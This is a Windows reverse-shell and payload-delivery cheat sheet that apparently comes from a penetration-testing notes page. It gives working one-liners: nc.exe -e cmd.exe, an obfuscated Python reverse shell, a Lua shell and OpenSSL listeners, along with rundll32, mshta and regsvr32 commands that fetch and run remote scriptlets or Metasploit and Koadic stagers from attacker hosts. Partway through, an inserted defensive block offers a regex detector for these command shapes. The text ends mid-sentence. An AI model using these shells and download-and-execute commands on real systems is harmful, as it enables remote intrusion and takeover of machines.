The page lolbas-project.github.io is for Windows what https://gtfobins.github.io/ is for Linux.
Obviously there are no SUID files or sudo privileges on Windows, but it is useful to know how some binaries can be (ab)used to perform unexpected actions such as executing arbitrary code.
NC
nc.exe -e cmd.exe <Attacker_IP> <PORT>
SBD
sbd is a portable and secure Netcat alternative. It works on Unix-like systems and Win32. With features such as strong encryption, program execution, configurable source ports, and continuous reconnection, sbd offers a versatile solution for TCP/IP communication. For Windows users, the sbd.exe build shipped with the Kali Linux distribution can be used as a reliable replacement for Netcat.
#Windows
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Web Delivery
The Web Delivery module is a unique way of delivering payloads through a web server. The module starts a web server that hosts a payload. When the target visits the server, the payload is executed on the target machine. This method is useful for delivering payloads in scenarios where the target is not directly accessible from the attacker's machine.
PowerShell
PowerShell is a task automation and configuration management framework from Microsoft, consisting of a command-line shell and associated scripting language. Metasploit has a wide range of PowerShell payloads that can be used to execute code on a target machine. These payloads are useful for scenarios where traditional methods may be detected by security solutions.
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
OpenSSL
Attacker (Kali)
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here you will be able to get the response
Victim
Windows
Windows Command Prompt
The Windows Command Prompt is a very useful tool for performing various tasks during an attack. It can be used for running commands, navigating the file system, creating new files and much more.
PowerShell
PowerShell is a powerful scripting language that attackers can use to carry out advanced attack techniques. It offers a wide variety of functions and can even be used for malicious code execution.
Metasploit Meterpreter
Metasploit Meterpreter is a powerful attack tool provided by Metasploit. It offers a complete environment for carrying out attack techniques on a victim's system. Metasploit Meterpreter offers a variety of functions such as file management, process control, and even webcam capture.
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
Rundll32 - Metasploit
use windows/smb/smb_delivery
run
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0
Rundll32 - Koadic
use stager/js/rundll32_js
set SRVHOST 192.168.1.107
set ENDPOINT sales
run
#Koadic will tell you what you need to execute inside the victim, it will be something like:
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
use multi/script/web_delivery
set target 3
set payload windows/meterpreter/reverse/tcp
set lhost 10.2.0.5
run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
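The rundll32, mshta, regsvr32 and nc.exe command shapes shown above, together with the scriptlet file earlier on the page, are the kind of thing a defender wants to catch in process-creation telemetry. The following is an added example, not code from the original page or from Metasploit, Koadic or the LOLBAS project: it runs a handful of regex rules over command lines of the form Sysmon Event ID 1 or Security event 4688 (with command-line auditing) records, and separately inspects a .sct body for a WScript.Shell Run call. The sample command lines are constructed for this example (hosts and ports are placeholders), and the sample scriptlet is the page's own.

```python
"""
Added example (not from the original page or any project it mentions):
a small detector for the living-off-the-land command shapes the page shows.
It scans Windows process-creation command lines and inspects .sct scriptlet
bodies. All sample inputs below are constructed for this example.
"""
import re
from typing import Dict, List

# Detection rules: (name, case-insensitive regex over the full command line).
# Each pattern mirrors one of the command shapes shown on the page.
RULES = [
    # rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";...
    ("rundll32_inline_script",
     re.compile(r"rundll32(\.exe)?\s+(javascript|vbscript):", re.I)),
    # rundll32.exe \\host\share\x.dll,0  (DLL loaded over SMB / UNC path)
    ("rundll32_unc_dll",
     re.compile(r"rundll32(\.exe)?\s+\\\\[\w.-]+\\", re.I)),
    # mshta vbscript:Close(Execute(...))
    ("mshta_inline_script",
     re.compile(r"mshta(\.exe)?\s+(vbscript|javascript):", re.I)),
    # regsvr32 /s /n /u /i:http://host/x.sct scrobj.dll
    ("regsvr32_remote_scriptlet",
     re.compile(r"regsvr32(\.exe)?\s.*/i:https?://\S+\s+scrobj\.dll", re.I)),
    # nc.exe -e cmd.exe <ip> <port>
    ("netcat_exec_shell",
     re.compile(r"\bnc(\.exe)?\s+(?:\S+\s+)*-e\s+\S*(cmd|powershell)", re.I)),
]

# A scriptlet that instantiates WScript.Shell and calls Run spawns a process.
SCRIPTLET_SHELL_RX = re.compile(
    r"ActiveXObject\(\s*[\"']WScript\.Shell[\"']\s*\)\s*\.Run\s*\(", re.I)


def classify(command_line: str) -> List[str]:
    """Return the names of every rule the command line matches (empty if none)."""
    return [name for name, rx in RULES if rx.search(command_line)]


def scan(command_lines: List[str]) -> List[Dict[str, object]]:
    """Run every rule over a batch of command lines and return only the hits."""
    hits = []
    for index, cmd in enumerate(command_lines):
        matched = classify(cmd)
        if matched:
            hits.append({"index": index, "rules": matched, "command_line": cmd})
    return hits


def scriptlet_runs_process(sct_text: str) -> bool:
    """True if a .sct body creates WScript.Shell and calls Run on it."""
    return bool(SCRIPTLET_SHELL_RX.search(sct_text))


# Constructed sample command lines: the first five follow the page's examples
# (placeholder hosts/ports); the last three are ordinary, benign usage.
SAMPLE_COMMAND_LINES = [
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();',
    'mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")"))',
    "regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll",
    r"rundll32.exe \\10.2.0.5\Iwvc\test.dll,0",
    "nc.exe -e cmd.exe 10.2.0.5 4444",
    r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
    r'regsvr32 /s "C:\Program Files\Vendor\lib.dll"',
    r"mshta.exe C:\Users\alice\AppData\Local\report.hta",
]

# The page's scriptlet, reproduced here as sample input.
SAMPLE_SCT = """<?XML version="1.0"?>
<scriptlet>
<public></public>
<script language="JScript">
<![CDATA[var r = new ActiveXObject("WScript.Shell").Run("calc.exe");]]>
</script>
</scriptlet>"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_COMMAND_LINES):
        print(f"[{hit['index']}] {', '.join(hit['rules'])}: {hit['command_line']}")
    print("scriptlet spawns a process:", scriptlet_runs_process(SAMPLE_SCT))
```

The rules are deliberately narrow: a rundll32 call is only flagged when its first argument is an inline `javascript:`/`vbscript:` URI or a UNC path, and regsvr32 only when it combines `/i:http` with scrobj.dll, so the three ordinary invocations at the end of the sample list produce no hits. Broader variants (encoded arguments, renamed binaries) need additional rules or image-hash matching; this block only covers the exact shapes the page documents.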
You can very easily download and execute a Koadic zombie using the regsvr stager.
In the Shells folder there are many different shells. To download and execute Invoke-PowerShellTcp.ps1, make a copy of the script and append to the end of the file: